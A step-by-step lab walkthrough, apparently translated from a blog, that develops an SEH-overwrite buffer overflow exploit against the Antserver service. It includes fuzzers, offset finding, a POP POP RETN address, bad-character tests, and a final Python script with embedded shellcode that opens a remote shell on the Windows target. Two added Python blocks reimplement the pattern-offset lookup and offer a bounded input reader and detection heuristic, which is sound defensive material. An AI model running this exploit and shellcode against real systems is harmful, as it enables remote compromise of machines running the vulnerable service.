First:
1. Download the Antserver application and install it in VirtualBox.
2. Write a fuzzer to run against Antserver while it is attached in OllyDBG.
Example fuzzer:
#!/usr/bin/python
import socket
target_address = "192.168.43.128"
target_port = 6660
# "USV " verb followed by 2500 bytes of 0x41, then the command terminator
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()
3. Once the fuzzer is written in a terminal on BackTrack, start Antserver, then in OllyDBG choose File > Attach, select Antserver and click Run. After that, run the fuzzer you wrote.
Example images of the application running:
image: Antserver running
image: attaching to Antserver in OllyDBG
image: the result of running the fuzzer
4. After the fuzzer has run, we check whether the EIP address was overwritten. Click View and select SEH chain.
Example images:
image: the View menu
image: the resulting SEH chain
5. Press Shift+F9 to pass the exception to the program; the registers (FPU) pane now shows EIP = 41414141.
Example image:
image: the result after Shift+F9
6. Look at the data in the buffer memory by right-clicking the stack and choosing Follow in Dump.
Example image:
image: the resulting stack
7. Next we look for a stepping stone: an address holding a POP, POP, RETN sequence. Before that, there are a few things to consider:
>. The module must belong to the running application, since it will serve as the springboard. To see which modules are loaded, click View > Executable modules.
Example images:
image: the View menu
image: the Executable modules list
>. Copy Vbajet32.dll to the BackTrack system for further analysis. After copying it, run the following commands (they check whether the module carries a SafeSEH handler table and what its DllCharacteristics flags are):
# ./msfpescan -i /tmp/vbajet32.dll | grep SEHandler
# ./msfpescan -i /tmp/vbajet32.dll | grep DllCharacteristics
Example image:
>. After running the commands above, double-click vbajet32.dll, then right-click in OllyDBG and choose Search for > Sequence of commands.
Example image:
>. In the Find sequence of commands dialog, enter POP r32, POP r32, RETN and click Find.
Example image:
>. The memory address found in Vbajet32.dll.
Example image:
8. Find the offset within the buffer of the bytes that overwrite SEH.
# pattern_create.rb 2500
Example image:
Edit the fuzzer as below:
#!/usr/bin/python
import socket
target_address = "192.168.43.128"
target_port = 6660
# cyclic pattern produced by pattern_create.rb 2500, so the bytes that land in SEH map back to an offset
buffer = "USV "
buffer += "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D"
buffer += "\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()
9. Run the fuzzer you just edited.
Example image:
10. Press F9 to pass the exception through SEH.
Example image:
11. Run ./pattern_offset.rb 42326742 to look up the value now in the EIP register.
Example image:
12. Next, edit the fuzzer:
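To show where the number handed to pattern_offset.rb comes from, here is an added Python 3 example; it is not code from the blog and reimplements what pattern_create.rb and pattern_offset.rb do with the alphabet Metasploit uses (upper, lower, digit). The value 0x42326742 is the one from step 11 above; because x86 is little-endian it is the substring "Bg2B", which sits at offset 966 in the pattern, and the nSEH field sits 4 bytes earlier, at 962. Offsets are counted from the first pattern byte (after "USV "), which is why the next fuzzer pads with 962 bytes. The seh_layout helper name is my own.

```python
import itertools
import struct

# Alphabet order used by pattern_create.rb: upper-case, lower-case, digit.
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def cyclic_pattern(length):
    """Return the first `length` characters of the non-repeating
    'Aa0Aa1Aa2...' pattern (the same sequence pattern_create.rb prints)."""
    triplets = []
    for u, l, d in itertools.product(UPPER, LOWER, DIGITS):
        triplets.append(u + l + d)
        if len(triplets) * 3 >= length:
            break
    return "".join(triplets)[:length]


def pattern_offset(pattern, register_value):
    """Map a 32-bit value read from a register or the SEH chain back to its
    offset in the pattern. The register was loaded little-endian, so
    0x42326742 came from the bytes 42 67 32 42, i.e. the text 'Bg2B'.
    Returns -1 when the value is not part of the pattern."""
    needle = struct.pack("<I", register_value).decode("ascii")
    return pattern.find(needle)


def seh_layout(seh_offset):
    """Given the offset of the overwritten handler pointer, return where the
    two fields of the EXCEPTION_REGISTRATION record sit: nSEH (the next
    pointer) is the 4 bytes immediately before the handler pointer."""
    return {"nseh": seh_offset - 4, "seh": seh_offset}


if __name__ == "__main__":
    pat = cyclic_pattern(2500)
    off = pattern_offset(pat, 0x42326742)   # value fed to pattern_offset.rb in step 11
    print("handler pointer overwritten at pattern offset", off)
    print("record layout:", seh_layout(off))
```

Run it and compare the two numbers with the 962-byte padding in the step 12 fuzzer; if they disagree, the crash is not the one the walkthrough describes.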
#!/usr/bin/python
import socket
target_address = "192.168.43.128"
target_port = 6660
buffer = "USV "
buffer += "\x90" * 962            # padding up to nSEH (offset from pattern_offset.rb)
buffer += "\xcc\xcc\xcc\xcc"      # nSEH: INT3 breakpoints so the debugger stops here
buffer += "\x41\x41\x41\x41"      # SEH handler pointer: marker 41414141
buffer += "\x90" * (2504 - len(buffer))
buffer += "\r\n\r\n"              # command terminator, as in the other fuzzers
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()
Example image from the fuzzer above.
13. Next, edit the fuzzer to take control of the CPU:
Example fuzzer:
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV "
buffer+="\x90" * 962
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90" * (2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
Example image:
image: same fuzzer as before; open the SEH chain via View > SEH chain.
14. Press Shift+F9 to continue the process, then F7 to step until you reach the RETN.
Example image:
15. Next click View > Follow in Dump > Selection to see where the sent bytes ended up in memory.
Example image:
16. Next, search for a payload:
open msfweb; example image.
17. Next, edit the fuzzer (example fuzzer):
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90" * 16
buffer+="\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11"
buffer+="\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
buffer+="\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
buffer+="\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e"
buffer+="\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d"
buffer+="\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c"
buffer+="\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b"
buffer+="\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a"
buffer+="\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89"
buffer+="\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
buffer+="\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7"
buffer+="\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6"
buffer+="\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5"
buffer+="\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4"
buffer+="\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3"
buffer+="\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2"
buffer+="\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
buffer+="\x90" * (2500-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
Example image from the fuzzer:
I was getting bad characters, so when that happens we have to look for them one line of payload bytes at a time.
Example search for bad characters:
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90" * 16
buffer+="\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11"
buffer+="\x90" * (2500-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
The result from the fuzzer:
It turns out the first line of bytes contains no bad characters.
OK, I found bad characters on line 2 (\x20), line 3 (\x2f, \x25) and line 4 (\x30). I went back to msfweb to search for a payload again, but this time entered 0x00 0x0a 0x0d 0x20 0x2f 0x25 0x30 in Restricted Characters, clicked Generate, and copied the payload source into the fuzzer.
The fuzzer code:
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90" * 16
buffer+=("\xda\xdb\xbe\xf9\xf2\x90\x35\xd9\x74\x24\xf4\x29\xc9\x5a\xb1\x51"
"\x31\x72\x17\x83\xc2\x04\x03\x8b\xe1\x72\xc0\x97\x6c\x98\x66\x8f"
"\x88\xa1\x86\xb0\x0b\xd5\x15\x6a\xe8\x62\xa0\x4e\x7b\x08\x2e\xd6"
"\x7a\x1e\xbb\x69\x65\x6b\xe3\x55\x94\x80\x55\x1e\xa2\xdd\x67\xce"
"\xfa\x21\xfe\xa2\x79\x61\x75\xbd\x40\xa8\x7b\xc0\x80\xc6\x70\xf9"
"\x50\x3d\x51\x88\xbd\xb6\xfe\x56\x3f\x22\x66\x1d\x33\xff\xec\x7e"
"\x50\xfe\x19\x83\x44\x8b\x57\xef\xb0\x97\x06\x2c\x89\x7c\xac\x39"
"\xa9\xb2\xa6\x7d\x22\x38\xc8\x61\x97\xb5\x69\x91\xb9\xa1\xe7\xef"
"\x4b\xde\xa8\x10\x85\x78\x1a\x88\x42\xb6\xae\x3c\xe4\xcb\xfc\xe3"
"\x5e\xd3\xd1\x73\x94\xc6\x2e\xb8\x7a\xe6\x19\xe1\xf3\xfd\xc0\x9c"
"\xe9\xf6\x0e\xcb\x9b\x04\xf0\x23\x33\xd0\x07\x36\x69\xb5\xe8\x6e"
"\x21\x69\x44\xdd\x95\xce\x39\xa2\x4a\x2e\x6d\x42\x05\xc1\xd2\xec"
"\x86\x68\x0b\x65\x40\xcf\xd6\xf5\x56\x58\x18\x23\x32\x77\xb7\x9e"
"\x3c\xa7\x5f\x84\x6e\x66\x49\x93\x8f\xa1\xda\x4e\x8f\x9e\xb5\x95"
"\x26\x99\x0f\x02\x46\x73\xdf\xf8\xec\x29\x1f\xd0\x9e\xba\x38\xa9"
"\x66\x43\x90\xb6\xb1\xe1\xe1\x98\x58\x60\x7a\x7e\xcd\x17\xef\xf7"
"\xe8\xb2\xbf\x5e\xda\x8e\xc9\x87\x76\x4b\x43\xa5\xb6\x93\xa0\x83"
"\x47\x51\x6a\x2d\xf5\x7a\xe7\x5c\x80\xba\xac\xf5\xde\xd3\xc0\xf7"
"\x92\x32\xda\x72\x91\xc5\xf2\x27\x4e\x68\xaa\x86\x21\xe6\x4d\x79"
"\x93\xa3\x1c\x86\xc3\x24\x32\xa1\xe1\x7a\x1f\xae\x3c\xe8\x5f\xaf"
"\xf6\x12\x4f\xc4\xae\x10\xf3\x1e\x34\x16\x22\xcc\x4a\x38\xa3\x8e"
"\x6c\x5b\x47\x3d\x72\x4a\x57\x11")
buffer+="\x90" * (2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
Example images below:
image: generating the payload with the bad characters excluded
image: the source code copied into the fuzzer
image: the result of the payload, connecting with the command telnet 192.168.43.128 4444
image: the result, the dir command listing files on the Windows machine
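From the defender's side, the root cause this walkthrough exercises is that the server accepts a USV command line of more than 2500 bytes and lets it run over the SEH record. The following Python 3 example is added here (it is not code from the blog) to show the two things a practitioner wants at this point: a bounded reader that rejects such a line before it is processed, and a detection heuristic for captured requests. The 512-byte limit, the 64-byte NOP-run threshold, the function names and the sample requests are constructed assumptions; the samples only copy the shape of the fuzzers above.

```python
import re

# Assumed limit for a legitimate command line; the server in this walkthrough
# accepted at least 2500 bytes after "USV ", which is what lets SEH be overwritten.
MAX_LINE = 512


class ProtocolError(ValueError):
    """Raised when a request is not a well-formed, bounded command line."""


def read_command_line(data, max_line=MAX_LINE):
    """Hardened reader: accept only a CRLF-terminated, printable-ASCII command
    line of at most max_line bytes. The length is checked BEFORE the line is
    copied or parsed anywhere, which is the fix for an unbounded copy."""
    end = data.find(b"\r\n")
    line = data if end == -1 else data[:end]
    if len(line) > max_line:
        raise ProtocolError("command line too long: %d bytes" % len(line))
    if end == -1:
        raise ProtocolError("missing CRLF terminator")
    if any(b < 0x20 or b > 0x7e for b in line):
        raise ProtocolError("non-printable bytes in command line")
    verb, _, argument = line.partition(b" ")
    return verb, argument


def accepts(data, max_line=MAX_LINE):
    """True if read_command_line would accept the request, False if it rejects it."""
    try:
        read_command_line(data, max_line)
        return True
    except ProtocolError:
        return False


def suspicious_request(data, max_line=MAX_LINE, min_nop_run=64):
    """Detection heuristic for a captured request to the service: returns the
    list of reasons it looks like an overflow attempt (empty list = clean)."""
    end = data.find(b"\r\n")
    line = data if end == -1 else data[:end]
    reasons = []
    if len(line) > max_line:
        reasons.append("oversized command line (%d bytes)" % len(line))
    if re.search(rb"\x90{%d,}" % min_nop_run, line):
        reasons.append("run of %d+ NOP (0x90) bytes" % min_nop_run)
    if any(b < 0x20 or b > 0x7e for b in line):
        reasons.append("non-printable bytes in a text command")
    return reasons


# Constructed sample requests (not captured traffic).
BENIGN = b"USV alice\r\n\r\n"
OVERSIZED = b"USV " + b"\x41" * 2500 + b"\r\n\r\n"                        # shape of the first fuzzer
SLED = b"USV " + b"\x90" * 962 + b"\xcc" * 4 + b"\x41" * 4 + b"\r\n\r\n"  # shape of the step 12 fuzzer

if __name__ == "__main__":
    print(read_command_line(BENIGN))
    for sample in (BENIGN, OVERSIZED, SLED):
        print(len(sample), "bytes:", suspicious_request(sample) or "clean")
```

The reader and the heuristic share one rule (a command line has a small bounded length and printable content), so a request the heuristic flags is also one the hardened reader refuses; the heuristic exists for the case where the vulnerable server cannot be patched and traffic to port 6660 is inspected instead.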